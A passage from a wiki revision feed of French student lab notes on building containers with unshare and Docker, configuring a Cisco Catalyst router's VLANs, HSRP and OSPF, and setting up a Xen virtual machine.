&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== Le routage de sites (IPv4) ====&lt;br /&gt;
&lt;br /&gt;
==== Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49076</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49076"/>
				<updated>2018-12-21T11:17:17Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* Sécurisation Wifi par WPA2-EAP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
